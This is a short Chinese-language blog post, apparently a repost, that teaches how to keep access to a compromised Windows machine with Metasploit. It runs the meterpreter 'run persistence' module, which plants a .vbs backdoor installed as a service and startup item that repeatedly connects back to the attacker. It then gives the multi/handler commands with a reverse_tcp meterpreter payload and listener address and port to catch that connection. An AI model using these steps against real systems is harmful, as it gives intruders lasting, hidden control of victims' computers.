滲透之——Metasploit訪問控制的持久化
阿新 • • 發佈:2019-01-14
轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86358463
工具:Metasploit
為了實現這一點,可以選擇在目標計算機上新增一個新的使用者,也可以選擇使用MSF中persistence模組。
執行persistence模組可以通過在目標計算機上安裝一個永久性的後門來實現訪問控制的持久化。這樣,即使有一天目標計算機修補了漏洞,我們仍然可以通過這個連線來實現對目標計算機的控制。
這裡,我們假設經過了一系列的滲透拿到了system許可權的meterpreter,我們在meterpreter命令列執行如下命令:
run persistence
執行persistence模組會向目標計算機上傳一個.vbs型別的惡意指令碼檔案,並在目標計算機上執行這個惡意指令碼檔案。這個指令碼一旦在目標計算機上執行,每隔幾秒鐘就會主動連線攻擊者的計算機。這個惡意指令碼檔案會被當做一個系統服務安裝在目標計算機系統中,同時,會被新增到開機啟動項中,因此,無論目標計算機重啟多少次,該惡意服務都可以執行。除非解除安裝該服務或手動刪除檔案,否則惡意服務一直存在。
這裡,我們重新開啟一個MSF來驗證:
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.109.137 set LPORT 4444 exploit
此處需要注意的是:我們設定攻擊載荷和LPORT選項必須與執行persistence模組時設定的攻擊載荷和LPORT選項相同。
發出攻擊命令exploit後,exploit/multi/handler開始等待從目標系統上發回來的連線。一旦傳入的連線被檢測到,控制端就會切換到Meterpreter命令列。